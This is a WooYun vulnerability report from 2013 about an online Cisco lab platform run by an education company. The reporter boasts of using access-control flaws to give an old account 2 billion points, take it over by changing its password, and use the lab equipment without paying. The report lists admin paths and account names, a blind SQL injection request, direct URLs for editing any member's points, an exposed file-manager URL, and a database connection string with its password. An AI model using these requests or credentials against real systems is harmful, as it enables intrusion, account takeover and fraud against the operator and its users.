当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044477

漏洞标题:越权使用在线实验室500多台思科机架设备

相关厂商:安博教育

漏洞作者: [email protected]

提交时间:2013-12-03 16:01

修复时间:2014-01-17 16:02

公开时间:2014-01-17 16:02

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我是来刷核心白帽的。此致,敬礼。
测试事件发生在2011年8月份学习期间,去朋友所在城市学习时碰巧测试,漏洞至今存在。

详细说明:

以前在这个号称全国第一的培训机构学Cisco的时候老师说只有CCIE或额外花钱才有权使用机架设备,屌丝穷学生只有用小黄帽的命,最多玩玩packet tracer,这让我心里这个不平衡,同样花了几千快咋待遇就那不同,以前上初中的时候好歹还能玩到锐捷、华三的设备,高中最差也是思科的2600啊,当时那感觉就像明明有女朋友却无法升级练大招一样,没钱合成。
没办法 ,自力更生吧。
一顿扫描后发现很多文件可以越权访问,虽然被302重定向了,但使用httpdebug之类的工具都可以直接获得页面源码,AWVS可直视html。
通过页面获得的参数直接修改已有会员的会员点数(随便找了个几年前不用的帐号),给自己加了2000000000(20亿)点,然后改掉帐号密码,呵呵呵,话说他们的机架基本可以说是全国No.1or2了,设备N多,光各种机架拓扑就可以在其实验室网站寻获不少,不过后来没用几次,可惜了。
后台其实可以改管理员密码的,没敢改,也用不着。不过我估计是可以的。
http://lab.ccxx.net/admin/menu.php
http://lab.ccxx.net/menu.php
http://lab.ccxx.net/admin/login.php
http://lab.ccxx.net/admin/inc/ -------------列目录漏洞
网站根目录:/var/www/user_point.php
网站管理员帐号:
admin
ccxx-rs
ccxx-sec
lx

Bind SQL Injection:可以添加会员  [20131130 PS:不知道还有没有效估计现在还可以]
GET http://lab.ccxx.net:80/user_modify.php?action=%24%7binjecthere%7d HTTP/1.1
Cookie: PHPSESSID=55b3c0fac8128f4a48d29e882e161bf2
Host: lab.ccxx.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*


---------------------------------------------------------

查看会员点数:
http://lab.ccxx.net:80/admin/point.php?action=list&preservedMan=wc02070724
增加会员点数:
http://lab.ccxx.net:80/admin/pointmod.php?action=edit&preservedMan=wc02070724&op_kind=add&point=888888888&action=doedit&submit=%CC%E1%BD%BB
删除会员点数:
http://lab.ccxx.net:80/admin/pointmod.php?action=edit&preservedMan=wc02070724&op_kind=redu&point=147483647&action=doedit&submit=%CC%E1%BD%BB


------------------------------------------------------------------
附送个他们集团某网站的FCK地址:
http://aptp.ambow.com/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

Mysql数据库:
连接:jdbc:mysql://10.10.40.161:3306/atp
帐号:atpuser
密码:atpambow8888

漏洞证明:

1.png


1.1.png


2.png


3.png


4.png

修复方案:

估计会被忽略,不过无所谓。 重在意义,而非rank。

版权声明:转载请注明来源 [email protected]@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝